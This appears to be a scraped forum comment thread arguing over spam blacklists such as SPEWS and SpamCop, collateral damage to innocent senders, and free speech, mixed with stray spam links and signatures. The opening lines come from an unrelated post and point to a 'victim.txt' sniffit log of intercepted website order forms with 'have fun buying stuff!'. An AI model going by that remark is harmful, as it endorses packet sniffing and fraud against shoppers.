not very cool code, but it does it job. victim.txt is a logfile from sniffit when i POST their order-form on their website.
have fun buying stuff!
I am part of the collateral damage.
Because of black lists and a dial-up connection, I can not use my home server to send email to a friend of mine who uses earthlink or to subscribe to a number of SourceForge mailing lists. At work, I can not receive email from my wife or daughter, because they use web.de addresses
Neither my wife, my daughter nor I have had anything to do with spamming, yet we are limited in our ability to use the internet to communicate with each other or with our friends. This limitation is due to conditions which are almost completely out of our hands to control or to correct. Who is going to compensate us for our loss of use? Why are our rights sacrificed and written off as a necessary part of gaining a greater good?
Some here will no doubt argue that I should pressure my ISP to stop supporting spam. They want the anti-spammer's denial of service and use to rouse me to take up their cause. I should join them on the barricades. I am not going to do this because:
1) I don't have the time or resources to fight this.
2) I don't think my ISP has violated my rights. I think Julian Haight, et al. have violated my rights by taking from me functionality I have a valid reason to expect from my ISP.
3) I think that the anti-spammer's have held a huge kangaroo court in which I have been injustly tried and jailed.
Bureaucracy loves company.
You don't seem to see the difference between the courts holding an ISP responsible and users shunning an ISP. Since everybody loves analogies when we talk about spam, how about this one:
Your local mall rents space to the Ku Klux Klan.I can boycott the KKK store, but it's pretty meaningless, since I already have a defacto boycott against them. Should the mall be forced by law to kick out the Klan? No, why should the goverment be involved in this private transaction? Will I want to be seen entering a mall that has a Klan store? Will I feel safe there? Will I want my family to visit that mall? No, no, and no. Boycotting the mall hurts the taco stand in the food court, but I still wouldn't visit.
Boycotting the ISP is the same as private citizens boycotting the mall.They enable something I feel is immoral. There are people in the world who would boycott an entire ISP for hosting a pr0n site. More power to 'em. I disagree, but they have the right to do it.
I'm a contractor for a company that sends out a free gift in exchange for signing up for my client's mailing list when they make a purchase. Our list of customers is now quite large at 60,000 plus email addresses. The problem we've had with spam cop is that some customers will forget (several months after the fact) that they ever signed up for the list in the first place and report our flier as spam. It seems that once one person reports you as a spammer there is nothing you can do to clear your name. Every email that we send is to a prior customer and a link and 800 number are provided to remove your self from the list.
Is it possible to use email for commercial purposes without being labeled a spammer?
Buy my shit at http://www.cellup.com
And I don't understand the comments either.. uncomfortable politcal views are a necessity if you believe that democracy should allways have it's way, yet, people don't like the Hitlers, the Sadam's, and the Bushes, and would rather live happily ever after and just not have to think about people like that messing up their lives. I can understand, but that indifference is growing to the extend that democracy and free speech are subject to limits. And I think that is wrong.
You constantly have to deal with bad practice of people, tell them they are wrong or unappreciated. But you have to give them the freedom to make the mistakes. Of course, when they do damage in any way to society, or their neighbouring societies, the fun should end.
my cents..
With great power comes great electricity bills.
It's flawed, simply because those things don't affect me. If somebody posts a copyright violating HTML file on a server I never look at, it doesn't directly waste my time, money or resources.
If they send me annoying email telling me they're doing this, it does.
(And, yes, wasting my time and money and resources because they're being used for something I don't want them to be used for. )
I run my own server. Tell me again how I am infringing on someone's right to free speech by electing to not receive their message?
I simply can't follow your logic.
It's my bandwidth, my server, my software, my electricity, and my choice to decide who I will talk to or not, right?
OK, let's say a spammer fakes an email to make it look like it came from your server, and you get put an the RBL.
It's your bandwidth, your server, your software, your electricity...and someone else has chosen to whom you can and cannot send email.
Would you support RBLs if you were an innocent victim? How would you feel being "collateral damage"?
Bureaucracy loves company.
how about mailing list and similar emails?
you cant add the all mailing list participants to a whitelist and many times the email comes from the user (the sender) not the mailing list address.
asking for all the mailing list to register in your mail server is also a impossible thing to do
Higuita
how about mailing list?
see my post here
Higuita
The censorship issue brought up in the article is not about the poor spammers' freedom of speech being infringed upon. It's about legitimate organizations like peacefire.org, who have found themselves on blacklists as "collateral damage" and have had a hellacious time getting off those lists due to the way blacklist maintainers (particularly SPEWS) tend to be anonymous and difficult to reach. A related problem that's brought up is the way anonymous list maintainers can, if they choose, put someone on their blacklist as part of a vendetta instead of for legitimate reasons.
-- To Err is human, to Ignignokt divine.
I must say that generally, I support blackholes, as long a process of review exists. Blocking a whole block of IPs or even a single IP *forever* without appeal is simply not fair to follow-on users who get assigned a spammers old IP address. When a spammer finds out he is blocked, he changes his address or ISP, so blackholes are only a temporary impediment to him. But what about a new subscriber to an ISP who gets assigned the old address? Its like moving to a new apartment and getting arrested by the police because a criminal *used-to* live at your apartment. There should be a clear method to say "please de-list me because I'm a new person at this address".
That article is complete bullshit.
First, if an e-mail is not delivered, the recipient receives a notice of the fact, as long as he is properly identified as the source of the e-mail.
Second, I have had a number IP addresses in our range blocked by a whole host of different DNSBL, for many different reasons. The *ONLY* blacklists I never got removed from were those which block ranges for a whole region (like South America or Brazil).
Moreover, the process might take two or three days (though it's seldom more than 24 hours), but it's always VERY clear.
That article reads more as a pro-spam article in disguise.
(8-DCS)
Before putting RBLs into use spamassassin was catching between 50 and 80 spam a day. After the RBLs were made active it traps 5 or 6 a day. I hadn't put them in because I was worried about the high number of false entries but as long as I don't use ORBS things seem to work fine.
--
If I actually could spell I'd have spelled it right in the first place.
A "waste of resources" is too abstract for a potential anti-spam ally. Besides, since when is the US known for efficient use of resources? But if you make the issue clearcut -- as in "YOU ARE PAYING TO RECEIVE JUNK MAIIL" -- the response in the general, out-of-the-know community might b different. Yeah, you've heard this before, but to the folks who might see spam as a speech issue, consider this: "Hi, I'm Wal-mart, I'm sending you some real mail. Please hand your mailman 50 cents for postage." By the way,
Wank it at SmoothPorn.
No, its like buying goods that don't work. So the solution is to take it back to the vendor and complain. In this case, the ISP has knowingly given you tainted goods and taken your money for it. Since the contract for usage of the IP address is between you and the ISP, naturally its the ISP you should approach. They then have the choice of either fixing their problem, or giving you a new IP address.
I agree with you that this is basically an ISP problem and that ISPs have responsibility to police their user-base. But what about an ISP who does finally clean up his act and eliminates the spammers on his sub-net? Shouldn't he have a process by which to get his addresses de-listed?
Haven't you ever heard of a newsgroup killfile? Guess what? They were were around and extremely popular long before the "internet" went mainstream.
If I want to use someone's spam blacklist it's no different than if I want to use someone's killfile. You have to the right to speak, but I don't have to listen.
Why should an ISP expect immediate removal? Surely if they take their time to eject a spammer from their networks they should expect likewise from the community? Considering blacklisting is used as a last resort when all other avenues - abuse reports, reeducation - have failed, why should it be an easy life? Why not avoid blacklisting in the first place and have a well monitored and working abuse department?
Why, the bucket of course...
ich bin der musikant
mit taschenrechner in der hand
kraftwerk
To the best of anyone's knowledge, SPEWS' approach is this:
1) Set up spamtrap addresses, seed them on Web and USENET
2) Receive spam: complain to ISP.
a) If spam stops, stop.
a) If spam continues, blacklist.
3) If spam still continues, expand blacklist by stages until the entire ISP is blocked.
4) Keep blacklist in place until
a) the ISP notices its problem and stops the spam
b) the ISP goes out of business
c) the Universe undergoes a heat death
Note that this is a LOT better than the alternative, where every mail admin runs his own blacklist. Such lists are virtually impossible to get out of, because nobody has the time to check for removals. I believe that a great deal of what was once AGIS IP space is still blocked at many sites, and that block is a 4c 'heat death' type.
Real Daleks don't climb stairs - they level the building.
I frequently get spammed on MSN, well actually using Gaim client on Linux with MSN protocol, from pr0n operators trying to get me to click on this webcam or that. Don't know if it's a weakness in the Gaim implementation or some vulnerability on the MSN server side.
Certainly not on the same scale as e-mail, but it does happen.
Hey, Windows users, there is no such thing as "forward" slash, there is only slash and backslash.
My question about all this is who annointed the black hole list holders to do this? In my (thankfully) few dealings with the managers of such lists I have found them to be smug, self righteous zealots who shoot first and ask questions later. Even worse are those who suspend their own responsibilities to their users by subscribing to their lists.
I can tell right away when a message is spam, just from the subject or the first few lines. So I would think that, say, a neural network or a set of genetic algorithms could be taught to recognize spam with good accuracy and delete it automatically.
No he would aply to get taken off like any resonable person who is unjustifiably put into the list.
Your just mad because you use a ISP that is a known spam contributer and no-one wants to read the garbage coming from that domain
I firmly believe that anyone has the right to publish a list of who they believe are spammers.
What the article and most of the discussion fail to look at is the other side of the mail connection.
No one is preventing anyone from sending mail. What is happening is system administrators are choosing to follow the information that is published in BLs and then acting on that choice. The result is that some systems (individual computers, companies, or entire ISPs) will not receive mail that is on a BL. Again mail is not being prevented from being sent, it is prevented from being received.
Control over this is determined by who you receive your mail form, not by who is publishing the BL or who is sending the mail.
The discussion should not be about if BLs are good or bad, it should be asking the questions like:
You should substitute your company or organizations mail administrator for ISP above if your organization is maintaining its own mail servers.
If you are a mail system administrator your job is to choose a set of BLs that have policies that agree with your users (customers) needs and provide an appropriate balance between filtering and collateral damage. If you are an end user, your job is to patronize a service provider that filters appropriately for your needs. That is what you are paying the service provider to do for you; provide service.
What, you mean perform the job of being an ISP in a professional and competent manner? Oh, now, that's just crazy talk.
GCHQ Quantum Insert installed. If only our tongues were made of glass, how much more careful we would be when we speak
Try a search for "Montgomery bus boycott" on your search engine of choice.
Yes, some nations laws are less clear on boycotts (Canada), and in the US, certain types of organized boycott are unlawful (e.g. a group boycott by businesses meant to stifle competition, or where boycotts are used in certain labor disputes). But a "pure" voluntary organized boycott is lawful in the US.
I do not deploy Linux. Ever.
Spammers
will just team up with hackers with a few thousand machines that are "owned" to do the encryption, and then have those machines send out the mail via a few open relays, so they can keep their stable of machines "safe."
the grid: It isn't just for finding aliens any more.
"Has it been over a year since you last donated to the Electronic Frontier Foundation [eff.org]?"
I don't give money to spammers or spam supporters.
If anyone knows of an organization like the EFF which is not a spam apologist, please let me know, so that I can support it.
Comment removed based on user account deletion
I may be wrong here but I recall choosing ot use a RBL with my personal mail handler I was not forced. Since the community is sick of telemarketers, spammers, Instant Message spams and even spam in the mail I think it's high time we could at least have control over one of them.
Spam in the snailmail is a necessary evil so I can accept it. My apt complex is even courteous enough to provide a garbage can at the mailboxes so they can recycle all the wasted paper.
Personally I wish the big bells would go after people that are sending all the spam.
The problem with RBL's which undermines their value is often purely their own fault - overzealousness. SpamCop is definitely the worst here.
We run a moderate sized ASP, we host about 150 web sites for non-profit clients and send about 1.5m emails a week, all explicit sign up and opt-in, no spam of course.
Never a week goes by but we recieve a SpamCop complaint, *not* about the emails we send, but about some email neither us nor our clients have ever seen or had anything to do with, that happens to mention one of their URLs in a tag line. The complaint goes not to the spammer or their ISP, not to the our client or us, but the upstream provider.
SpamCop assumes that if an email is reported as spam, then any owner of any URL it links to is a spammer. This nonsense and flawed logic just wastes everyone's time. Just because some spammer in Taiwan likes Slashdot doesn't mean that Taco boy is a spammer.